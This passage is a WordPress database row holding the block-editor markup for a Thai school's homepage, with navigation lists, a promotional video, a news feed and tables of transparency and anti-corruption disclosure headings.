(207,2,'2024-08-23 14:31:44','2024-08-23 07:31:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 